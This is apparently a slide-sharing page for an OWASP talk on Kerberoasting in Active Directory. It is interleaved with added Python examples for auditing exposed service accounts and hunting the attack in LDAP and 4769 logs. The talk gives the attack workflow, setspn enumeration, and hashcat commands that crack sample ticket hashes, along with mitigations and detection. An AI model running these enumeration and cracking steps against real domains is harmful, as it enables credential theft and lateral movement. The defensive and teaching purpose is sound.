10 Differences between Sales Cloud and CPQ, Blanka Doktorová10 Differences between Sales Cloud and CPQ, Blanka Doktorová
10 Differences between Sales Cloud and CPQ, Blanka Doktorová
 
Speed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in MinutesSpeed Wins: From Kafka to APIs in Minutes
Speed Wins: From Kafka to APIs in Minutes
 
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptxUnpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
Unpacking Value Delivery - Agile Oxford Meetup - May 2024.pptx
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
 
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 

In the Wake of Kerberoast

1. In the Wake of Kerberoast
Ken Kitahara
2021/12/08 @ OWASP Sendai
2. Background
• In Active Directory network penetration testing, password issues are a serious problem.
• Attackers and penetration testers want to get credentials for:
  • Local Privilege Escalation
  • Lateral Movement
  • Domain Escalation
• Attackers and penetration testers don't want to do online password cracking if it is not required:
  • Online password cracking is very noisy and increases the likelihood of detection.
• How can we get password hashes for offline cracking?
3. Advent of Kerberoast
[Ref.] Attacking Kerberos - Kicking the Guard Dog of Hades
• https://redsiege.com/kerberoast-slides (Slide)
• https://www.youtube.com/watch?v=PUyhlN-E5MU (Video)
• Presented by Tim Medin (@TimMedin) at SANS HackFest 2014.
• A method to retrieve password hashes for offline cracking and to forge tickets.
• Local Administrator privilege is not required :)
4. Kerberos Authentication Flow
[Diagram: Client Computer, Domain Controller, Application Server; TGT flows from the DC to the client]
(1) AS-REQ (AS Request): The client requests a TGT (Ticket Granting Ticket) for the user account from the AS (Authentication Service) on the DC (Domain Controller).
(2) AS-REP (AS Reply): The DC sends the TGT for the requested user account to the client.
5. Kerberos Authentication Flow
[Diagram: Client Computer, Domain Controller, Application Server; the client presents the TGT and receives an ST]
(3) TGS-REQ (TGS Request): The client sends the TGT and requests an ST (Service Ticket) for the application server from the TGS (Ticket Granting Service) on the DC.
(4) TGS-REP (TGS Reply): The TGS on the DC sends an ST for the requested service to the client.
6. Kerberos Authentication Flow
[Diagram: Client Computer, Domain Controller, Application Server; the client presents the ST to the application server]
(5) AP-REQ (Application Request): The client sends the ST and requests authentication from the service on the application server.
(6) AP-REP (Application Reply): The server authenticates the client and grants access to the service.
7. Kerberos Tickets
❑ TGT (Ticket Granting Ticket)
• Issued by the AS (Authentication Service) in the KDC (Key Distribution Center) on the DC (Domain Controller).
• Used to obtain an ST (Service Ticket).
• Data is encrypted with the hash value of the krbtgt account.
❑ ST (Service Ticket)
• Issued by the TGS (Ticket Granting Service).
• Used to authenticate to a service (File Server, Web Server, SQL Server, etc.).
• Data is encrypted with the hash value of the service account.
• To obtain an ST, the client must present the TGT issued by the AS.
• [NOTE] In many security articles, "TGS" is used as a word meaning the ST.
8. Data in the Tickets
[Diagram: a TGT / ST contains Username, Session Key, Expiration Time, PAC (Optional)]
A ticket is encrypted with a key generated from a hash value:
❑ TGT
• The key is derived from the krbtgt account's NTLM hash.
• krbtgt's NTLM hash is uncrackable :(
❑ ST
• The key is derived from the service owner account's NTLM hash.
• If the service owner is a Computer Account, the NTLM hash is uncrackable :(
• But what if the service owner is some domain account?
9. Kerberoast Overview
[Diagram: the Client Computer sends a TGS-REQ with its TGT to the Domain Controller, receives a TGS-REP containing the ST for the Application Server, and cracks the ST offline]
$krb5tgs$23$*sqlsvc$contoso.local$MSSQLSvc/SQL01.contoso.local:1433@contoso.local*$BB513E29A412927A81C68973A0EE38F7$5B3C8A9497F374DC9B21C70AB65E36D9......
Crack!
10. Original Workflow for Kerberoast
1. An attacker authenticated as a domain user requests a TGT from the AS and gets the TGT.
2. The attacker requests an ST for the target service from the TGS and gets the ST.
3. The attacker extracts the tickets from memory as a file.
4. The attacker extracts a hash value from the ST file.
5. The attacker cracks the hash value and gets the plaintext password.
6. [Optional] After cracking the password, the ticket owner in the ST can be forged.
11. Requirements for Kerberoast
• Authenticated as a domain user account.
• A domain user account is set as a service account.
• The target service is registered as a valid service with the Kerberos server.
• [Optional] For fast offline password cracking, it is preferable that RC4 is the ticket encryption algorithm.
• Kerberoast doesn't need to communicate with the target service, so the target server's accessibility, availability and even existence are not required :)
12. Encryption Algorithms
• Tickets are encrypted with RC4, AES128 or AES256.
• The user's NTLM hash is used as the encryption key.
• If the ticket uses AES128 or AES256 as the encryption algorithm, a salt based on the account name is used.
Account Type | Format | Example
User Account | <Domain's FQDN in Upper Case><Account Name in Lower Case> | The salt for jeff@contoso.local is CONTOSO.LOCALjeff
Computer Account | <Domain's FQDN in Upper Case>host<Account Name in Lower Case> | The salt for pc01.contoso.local is CONTOSO.LOCALhostpc01.contoso.local
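As an added example (not from the slides), the salt rule in the table above and the first step of the AES string-to-key function, in Python with the standard library only. The account names, domain and password are constructed; treating a trailing "$" in the sAMAccountName as the marker of a computer account is my assumption about the input format, not something the slide states.

```python
"""Added example, not from the original slides: build the default AES
string-to-key salt for the two account types in the table above, then run the
PBKDF2 step of the RFC 3962 string-to-key function.  Account names and the
password are constructed sample values."""
import hashlib


def aes_salt(sam_account_name: str, domain_fqdn: str) -> str:
    """Default AES salt Active Directory uses for a principal.

    User account:     <REALM><sAMAccountName lower-cased>
    Computer account: <REALM>host<hostname lower-cased>.<domain lower-cased>
    A computer account is recognised here (assumption) by the trailing '$'
    of its sAMAccountName, e.g. PC01$ -> hostname pc01.
    """
    realm = domain_fqdn.upper()
    if sam_account_name.endswith("$"):
        hostname = sam_account_name[:-1].lower()
        return f"{realm}host{hostname}.{domain_fqdn.lower()}"
    return f"{realm}{sam_account_name.lower()}"


def aes_pbkdf2_step(password: str, salt: str, key_len: int) -> bytes:
    """First step of RFC 3962 string-to-key: PBKDF2-HMAC-SHA1, 4096 rounds.

    key_len is 16 for aes128-cts-hmac-sha1-96 and 32 for aes256-cts-hmac-sha1-96.
    The final DK(tkey, "kerberos") step needs an AES-CTS primitive and is left
    out here; it is one AES pass and does not change the per-guess cost much.
    Contrast with RC4 (etype 23), whose key is the NT hash: a single MD4 over
    the UTF-16LE password with no salt and no iteration, which is why the
    RC4 measurement later in the deck finishes so much faster.
    """
    return hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"),
                               salt.encode("utf-8"), 4096, key_len)


def keys_for_same_password(password: str, accounts, domain_fqdn: str) -> dict:
    """One password gives a different AES key per account because the salt
    carries the account name, so guesses cannot be shared across accounts.
    Returns {account: tkey_hex}."""
    return {name: aes_pbkdf2_step(password, aes_salt(name, domain_fqdn), 32).hex()
            for name in accounts}


if __name__ == "__main__":
    for acct in ("jeff", "sqlsvc", "PC01$"):
        print(acct, "->", aes_salt(acct, "contoso.local"))
    print(keys_for_same_password("Password123!", ["jeff", "sqlsvc"], "contoso.local"))
```

The contrast worth noticing is the per-guess cost: every AES candidate costs 4096 HMAC-SHA1 rounds per account, whereas an RC4 candidate costs one MD4 and the resulting NT hash is the same for every account with that password.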
13. Enumeration
• Services are managed by SPN (Service Principal Name).
• The SPN is a key component of Kerberos authentication for realizing Single Sign-On.
• The Kerberos server (DC) verifies services with the SPN.
• An SPN consists of a service name, computer name, domain FQDN, port number, service account name......
• Attackers can find targets for Kerberoast by enumerating SPN records.
• Find SPNs whose service owner is a domain user account.
• SPNs can be enumerated with the setspn.exe command, which uses an LDAP query.
• A direct LDAP search can also be used to find targets.
MSSQLSvc/dbsrv.domain.local:1433/CN=dbadmin,OU=SrvAdms,DC=domain,DC=local
14. Enumeration : setspn.exe
C:\>setspn -T contoso.local -Q */*
Checking domain DC=contoso,DC=local
--snip--
CN=CL01,CN=Computers,DC=contoso,DC=local
        RestrictedKrbHost/CL01
        HOST/CL01
--snip--
CN=sqlsvc,CN=Users,DC=contoso,DC=local
        MSSQLSvc/SQL01.contoso.local:1433

Existing SPN found!

This SPN record indicates:
• The domain user account contoso\sqlsvc manages SQL Server on SQL01.contoso.local.
• Attackers can retrieve a Kerberos-format hash from the ST.
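From the defender's side, the same conditions can be applied to an export of directory records to find the accounts exposed to Kerberoast before anyone else does. The following Python audit is an added example, not part of the talk or of any tool it names; the record layout and all sample accounts are constructed, and the sAMAccountType, userAccountControl and msDS-SupportedEncryptionTypes values are the standard Active Directory attribute encodings.

```python
"""Added example, not from the original slides: a defender-side audit that
applies the conditions Kerberoast tools encode in their LDAP filters (user
object, SPN set, enabled, not krbtgt, RC4 still allowed) to an export of
directory records.  The record format and all sample accounts are constructed."""

SAM_NORMAL_USER_ACCOUNT = 805306368   # 0x30000000, sAMAccountType of user objects
UAC_ACCOUNTDISABLE = 0x2              # userAccountControl bit for a disabled account

# msDS-SupportedEncryptionTypes bit flags
ETYPE_FLAGS = {0x1: "DES_CBC_CRC", 0x2: "DES_CBC_MD5", 0x4: "RC4_HMAC",
               0x8: "AES128_CTS_HMAC_SHA1_96", 0x10: "AES256_CTS_HMAC_SHA1_96"}


def decode_supported_etypes(value):
    """Decode msDS-SupportedEncryptionTypes.  None (attribute absent) or 0 means
    the DC falls back to its default, which on the slide's domain is RC4."""
    if not value:
        return {"RC4_HMAC (default, attribute unset)"}
    return {name for bit, name in ETYPE_FLAGS.items() if value & bit}


def rc4_allowed(value) -> bool:
    """Same test as the Rubeus filter: attribute unset, zero, or bit 0x4 set."""
    return (not value) or bool(value & 0x4)


def is_kerberoastable(rec) -> bool:
    """User object with at least one SPN, enabled, and not the krbtgt account."""
    return (rec["sAMAccountType"] == SAM_NORMAL_USER_ACCOUNT
            and bool(rec.get("servicePrincipalName"))
            and rec["sAMAccountName"].lower() != "krbtgt"
            and not (rec.get("userAccountControl", 0) & UAC_ACCOUNTDISABLE))


def audit(records):
    """Return one finding per exposed account, RC4-capable accounts first."""
    findings = []
    for rec in records:
        if not is_kerberoastable(rec):
            continue
        et = rec.get("msDS-SupportedEncryptionTypes")
        findings.append({
            "account": rec["sAMAccountName"],
            "spns": list(rec["servicePrincipalName"]),
            "etypes": sorted(decode_supported_etypes(et)),
            "rc4_allowed": rc4_allowed(et),
        })
    findings.sort(key=lambda f: (not f["rc4_allowed"], f["account"]))
    return findings


# Constructed sample export (what a defender would pull over LDAP).
SAMPLE_RECORDS = [
    {"sAMAccountName": "sqlsvc", "sAMAccountType": 805306368,
     "servicePrincipalName": ["MSSQLSvc/SQL01.contoso.local:1433"],
     "userAccountControl": 0x200},                       # etype attribute unset
    {"sAMAccountName": "websvc", "sAMAccountType": 805306368,
     "servicePrincipalName": ["HTTP/web01.contoso.local"],
     "userAccountControl": 0x200, "msDS-SupportedEncryptionTypes": 0x18},
    {"sAMAccountName": "oldsvc", "sAMAccountType": 805306368,
     "servicePrincipalName": ["HTTP/old01.contoso.local"],
     "userAccountControl": 0x202},                       # disabled
    {"sAMAccountName": "krbtgt", "sAMAccountType": 805306368,
     "servicePrincipalName": ["kadmin/changepw"], "userAccountControl": 0x202},
    {"sAMAccountName": "CL01$", "sAMAccountType": 805306369,   # machine account
     "servicePrincipalName": ["HOST/CL01", "RestrictedKrbHost/CL01"],
     "userAccountControl": 0x1000},
    {"sAMAccountName": "jeff", "sAMAccountType": 805306368,
     "servicePrincipalName": [], "userAccountControl": 0x200},
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_RECORDS):
        print(finding)
```

On the constructed data only sqlsvc and websvc are reported; sqlsvc comes first because its encryption-type attribute is unset and therefore RC4 is still issued for it.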
19. Password Cracking Tools' Support
• John the Ripper added support for the KRB5TGS format in September 2015.
• Hashcat added support for the KRB5TGS format in February 2016.
20. Invoke-Kerberoast
• If possible, attackers and penetration testers don't want to create files.
• Will Schroeder (@harmj0y) released Invoke-Kerberoast in November 2016.
• It is a PowerShell script and can retrieve the KRB5TGS-format hash without creating a ticket file.
21. Tools for Kerberoast
Tool | Description
kerberoast
  • Original tools for Kerberoast by Tim Medin.
  • Python scripts.
  • Service Tickets need to be output as files.
  • Can also extract Service Tickets from pcap files.
Invoke-Kerberoast
  • PowerShell script by Will Schroeder.
  • All operations can be executed in memory.
Rubeus
  • C# toolset for Kerberos-related attacks by Will Schroeder.
  • Probably the most used tool today in Kerberos-related attacks.
22. Real World Cases
• APT29 (a cyber espionage group with alleged ties to Russia) obtained Service Tickets for Kerberoast.
• FIN7 (a financially-motivated threat group) used Kerberoast for credential access.
• Operation Wocao (a China-based cyber espionage adversary) used Invoke-Kerberoast to request encrypted Service Tickets.
• Wizard Spider (a Russia-based financially-motivated threat group) used Rubeus, Mimikatz and Invoke-Kerberoast for credential access.
[Ref.] MITRE ATT&CK - Steal or Forge Kerberos Tickets: Kerberoasting
• https://attack.mitre.org/techniques/T1558/003/
23. Mitigation
• Ensure strong password length (ideally 25+ characters) and complexity for service accounts: mitigation for offline password cracking. Strong passwords make it infeasible to crack the password in a realistic amount of time.
• Enable Kerberos encryption stronger than RC4, and update DCs to Windows Server 2019 or a newer version: mitigation for offline password cracking. Strong encryption methods slow down offline password cracking.
• Limit service account privileges: this is a mitigation for lateral movement.
24. Encryption Methods in Kerberos
etype | Encryption Type
16 (0x10) | des3-cbc-sha-1
17 (0x11) | aes128-cts-hmac-sha1-96
18 (0x12) | aes256-cts-hmac-sha1-96
19 (0x13) | aes128-cts-hmac-sha384-192
20 (0x14) | aes256-cts-hmac-sha384-192
23 (0x17) | rc4-hmac / rc4-hmac-md5
• Kerberos supports many encryption methods for encrypting the data in tickets.
• In Active Directory, the default encryption method is rc4-hmac (etype = 23).
25. Enable Strong Encryption Method
• AES128 / AES256 can be enabled with the following procedure on the DC:
  1. Open [Active Directory Users and Computers].
  2. Open Properties for the service account.
  3. In the [Account] tab, check the following lines in the [Account options] section:
     • This account supports Kerberos AES128 bit encryption.
     • This account supports Kerberos AES256 bit encryption.
• This mitigation can be bypassed if the DC is older than Windows Server 2019, but it is useful for detection.
26. Speed Measurement (RC4)
┌──(kali㉿kali)-[~]
└─$ hashcat -m 13100 -r nsa-rules/nsa64.rule sqlsvc-rc4.txt rockyou.txt
--snip--
$krb5tgs$23$*sqlsvc$contoso.local$MSSQLSvc --snip-- 510ff11:Password123!
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*sqlsvc$contoso.local$MSSQLSvc/SQL01.co...10ff11
Time.Started.....: Tue Dec 7 06:12:39 2021 (2 secs)
Time.Estimated...: Tue Dec 7 06:12:41 2021 (0 secs)
OS : Kali Linux on VMware (Number of CPU : 2, Number of Core : 1, RAM: 2GB)
Password Dictionary : rockyou.txt
Rule : nsa-rules/nsa64.rule
27. Speed Measurement (AES256)
┌──(kali㉿kali)-[~]
└─$ hashcat -m 19700 -r nsa-rules/nsa64.rule sqlsvc-aes256.txt rockyou.txt
--snip--
$krb5tgs$18$sqlsvc$contoso.local$9aa3fdc96 --snip-- a793c4f:Password123!
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 18, TGS-REP
Hash.Target......: $krb5tgs$18$sqlsvc$contoso.local$9aa3fdc96a0caeb244...793c4f
Time.Started.....: Tue Dec 7 06:14:13 2021 (7 mins, 48 secs)
Time.Estimated...: Tue Dec 7 06:22:01 2021 (0 secs)
OS : Kali Linux on VMware (Number of CPU : 2, Number of Core : 1, RAM: 2GB)
Password Dictionary : rockyou.txt
Rule : nsa-rules/nsa64.rule
28. Detection : Enumeration
Tool | Common LDAP Filter
setspn.exe | (servicePrincipalName=*/*)
Invoke-Kerberoast | (&(samAccountType=805306368)(servicePrincipalName=*))
Rubeus | (&(samAccountType=805306368)(serviceprincipalname=*)(!samAccountName=krbtgt)(|(!msds-supportedencryptiontypes=*)(msds-supportedencryptiontypes=0)(msds-supportedencryptiontypes:1.2.840.113556.1.4.803:=4)))
• Most Kerberoast tools enumerate targets with an LDAP query.
• An LDAP filter containing servicePrincipalName=* is not expected in normal operation, so it is a good indicator for hunting Kerberoast.
• This detection can be bypassed, but it is a good way to catch script kiddies.
29. Detection : Enumeration
• LDAP query logging is not enabled by default.
• To enable LDAP query logging, set the registry value "15 Field Engineering" under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostics to a value between 1 and 5. The larger the number, the higher the level of detail.
• After setting the registry value, LDAP queries appear as event ID 1644 in the Directory Service log under Applications and Services Logs in Event Viewer.
30. Detection : Enumeration
The logging threshold values should be optimized. They are controlled by registry values under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters. If they are not set, the default values apply:
❑ Expensive Search Results Threshold (DWORD). Default value is 10,000. Logs when more entries than this value are retrieved.
❑ Inefficient Search Results Threshold (DWORD). Default value is 1,000. Logs when more entries than this value are searched and fewer than 10% of the results are returned.
❑ Search Time Threshold (msecs) (DWORD). Default value is 30,000. Logs any operation that exceeds this value (in milliseconds).
31. Detection : Enumeration
This example is generated by Rubeus.exe:
❑ (sAMAccountType=805306368) Lists all User objects.
❑ (servicePrincipalName=*) Lists all objects that have an SPN.
❑ (!(sAMAccountName=krbtgt)) Excludes the krbtgt user account.
❑ (!(userAccountControl&2)) Excludes disabled users.
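As an added example (not from the slides), a small Python hunt over event 1644 records that normalizes each LDAP filter and classifies it against the three filters listed on slide 28. The record layout with only a Client and a Filter line is a simplified, constructed rendering of the event text, and the client addresses are made up.

```python
"""Added example, not from the original slides: classify LDAP search filters
from Directory Service event 1644 records against the filters the slides list
for setspn.exe, Invoke-Kerberoast and Rubeus.  The record layout below is a
simplified, constructed rendering of the event text."""
import re

# Constructed 1644-style records: one "Client:" and one "Filter:" line each.
SAMPLE_EVENTS = """\
Client: 10.10.1.25:51234
Filter: (servicePrincipalName=*/*)

Client: 10.10.1.25:51240
Filter: (&(samAccountType=805306368)(servicePrincipalName=*))

Client: 10.10.1.40:60011
Filter: (&(samAccountType=805306368)(serviceprincipalname=*)(!samAccountName=krbtgt)(|(!msds-supportedencryptiontypes=*)(msds-supportedencryptiontypes=0)(msds-supportedencryptiontypes:1.2.840.113556.1.4.803:=4)))

Client: 10.10.2.7:49800
Filter: (&(objectClass=user)(sAMAccountName=jeff))
"""

# Any clause that searches servicePrincipalName with a wildcard value.
SPN_WILDCARD = re.compile(r"\(serviceprincipalname=\*[^)]*\)")


def normalize(filter_text: str) -> str:
    """Lower-case and drop whitespace so re-cased or line-wrapped filters compare equal."""
    return re.sub(r"\s+", "", filter_text).lower()


def classify(filter_text: str):
    """Return None for a benign filter, otherwise a label for the SPN-wildcard filter."""
    f = normalize(filter_text)
    if not SPN_WILDCARD.search(f):
        return None
    if "msds-supportedencryptiontypes:1.2.840.113556.1.4.803:=4" in f:
        return "rubeus-like (SPN wildcard + RC4 etype test)"
    if "(samaccounttype=805306368)" in f:
        return "invoke-kerberoast-like (user objects with SPN)"
    if f == "(serviceprincipalname=*/*)":
        return "setspn-like (all SPNs)"
    return "generic SPN wildcard search"


def parse_events(text: str):
    """Yield (client, filter) tuples from blank-line separated records."""
    for block in text.strip().split("\n\n"):
        fields = dict(line.split(": ", 1) for line in block.splitlines())
        yield fields["Client"], fields["Filter"]


def hunt(text: str):
    """Return [(client, label, filter)] for every suspicious record."""
    hits = []
    for client, flt in parse_events(text):
        label = classify(flt)
        if label:
            hits.append((client, label, flt))
    return hits


if __name__ == "__main__":
    for client, label, flt in hunt(SAMPLE_EVENTS):
        print(f"{client}\t{label}\n\t{flt}")
```

Matching on the normalized filter rather than the raw text matters because the attribute names in the Rubeus filter are lower-cased while the setspn.exe filter is mixed-case; a hunt that compares raw strings misses one or the other.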
32. Detection : Ticket Request
• A TGS-REQ raises an event with ID 4769 in the Security log under Windows Logs.
• If the number of application services is large, Kerberoast tools generate a large number of TGS-REQs in a short time, so this can be a good indicator.
• However, in general, a large number of TGS-REQs are generated anyway :(
33. Detection : Honeypot Service
• TGS-REQs are always being generated in a domain network, so it may be hard to find which one is the attacker's request.
• [A Solution] Set up a Honeypot Account and a Honeypot Service.
• Configure a fake service account and a fake SPN.
• If an attacker sends a TGS-REQ for the Honeypot Service, the attacker's intrusion can be detected.
34. Detection : Encryption Type
• In the TGS-REQ for Kerberoasting, attackers will try a downgrade attack to enable fast offline cracking.
• If an encryption method stronger than RC4 is configured, the Ticket Encryption Type field in the event logs can be used to detect the attacker's activity: 0x17 (= 23, rc4-hmac) indicates that rc4-hmac was used and the attacker performed a downgrade attack.
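The three 4769-based ideas above (request bursts, a honeypot service, and an RC4 downgrade) as one added Python example, not from the slides. The event records, the honeypot account name honeysvc and the list of AES-configured accounts are constructed; the field names follow the 4769 event XML (TargetUserName, ServiceName, TicketEncryptionType, IpAddress).

```python
"""Added example, not from the original slides: three checks over Security
event 4769 (TGS-REQ) records matching the detection ideas in the deck: a burst
of service-ticket requests from one account, any request for a honeypot service
account, and RC4 (0x17) tickets for accounts configured for AES.  Event
records, the honeypot name and the AES account list are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4769 records (field names as in the Windows event XML).
SAMPLE_4769 = [
    {"TimeCreated": "2021-12-07T06:10:00", "TargetUserName": "jeff@CONTOSO.LOCAL",
     "ServiceName": "sqlsvc", "TicketEncryptionType": "0x17", "IpAddress": "10.10.1.25"},
    {"TimeCreated": "2021-12-07T06:10:01", "TargetUserName": "jeff@CONTOSO.LOCAL",
     "ServiceName": "websvc", "TicketEncryptionType": "0x17", "IpAddress": "10.10.1.25"},
    {"TimeCreated": "2021-12-07T06:10:01", "TargetUserName": "jeff@CONTOSO.LOCAL",
     "ServiceName": "honeysvc", "TicketEncryptionType": "0x17", "IpAddress": "10.10.1.25"},
    {"TimeCreated": "2021-12-07T06:10:02", "TargetUserName": "jeff@CONTOSO.LOCAL",
     "ServiceName": "bkpsvc", "TicketEncryptionType": "0x17", "IpAddress": "10.10.1.25"},
    {"TimeCreated": "2021-12-07T06:10:02", "TargetUserName": "jeff@CONTOSO.LOCAL",
     "ServiceName": "CL01$", "TicketEncryptionType": "0x12", "IpAddress": "10.10.1.25"},
    {"TimeCreated": "2021-12-07T06:30:00", "TargetUserName": "alice@CONTOSO.LOCAL",
     "ServiceName": "websvc", "TicketEncryptionType": "0x12", "IpAddress": "10.10.2.7"},
    {"TimeCreated": "2021-12-07T06:45:00", "TargetUserName": "bob@CONTOSO.LOCAL",
     "ServiceName": "sqlsvc", "TicketEncryptionType": "0x17", "IpAddress": "10.10.2.9"},
]

HONEYPOT_SERVICES = {"honeysvc"}   # fake service account carrying a fake SPN (constructed)
AES_CONFIGURED = {"websvc"}        # accounts with AES128/AES256 enabled (constructed)
RC4_HMAC = "0x17"


def _t(ev):
    return datetime.fromisoformat(ev["TimeCreated"])


def _is_user_service(name):
    """Skip computer accounts and krbtgt, which dominate ordinary 4769 volume."""
    return not name.endswith("$") and name.lower() != "krbtgt"


def burst_requesters(events, window=timedelta(minutes=1), min_services=3):
    """Accounts that request tickets for >= min_services distinct user-owned
    services inside one sliding window.  Returns {requester: set(services)}."""
    by_user = defaultdict(list)
    for ev in sorted(events, key=_t):
        if _is_user_service(ev["ServiceName"]):
            by_user[ev["TargetUserName"]].append(ev)
    hits = {}
    for user, evs in by_user.items():
        for i, start in enumerate(evs):
            svcs = {e["ServiceName"] for e in evs[i:] if _t(e) - _t(start) <= window}
            if len(svcs) >= min_services:
                hits[user] = hits.get(user, set()) | svcs
    return hits


def honeypot_hits(events, honeypots=HONEYPOT_SERVICES):
    """Any TGS-REQ for a honeypot account is suspicious by construction."""
    return [(ev["TargetUserName"], ev["IpAddress"], ev["ServiceName"])
            for ev in events if ev["ServiceName"] in honeypots]


def rc4_downgrades(events, aes_accounts=AES_CONFIGURED):
    """RC4 tickets issued for services configured for AES: the requester asked
    for the weaker etype, which is the downgrade the slide describes."""
    return [(ev["TargetUserName"], ev["ServiceName"])
            for ev in events
            if ev["ServiceName"] in aes_accounts and ev["TicketEncryptionType"] == RC4_HMAC]


if __name__ == "__main__":
    print("bursts:", burst_requesters(SAMPLE_4769))
    print("honeypot:", honeypot_hits(SAMPLE_4769))
    print("downgrade:", rc4_downgrades(SAMPLE_4769))
```

On the constructed data only jeff trips all three checks; alice's AES ticket for websvc and bob's single RC4 ticket for an account that never had AES enabled are ordinary traffic and are not reported. The burst threshold and window are the knobs to tune against a real domain's baseline, which is the caveat slide 32 makes.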
35. Summary
• Kerberoast is a technique to get password hashes for offline cracking.
• To mitigate the attack: ensure strong passwords, enable strong encryption algorithms and restrict privileges for service accounts.
• Methods such as LDAP query logging and a Honeypot service are useful for detecting the attacker's activity.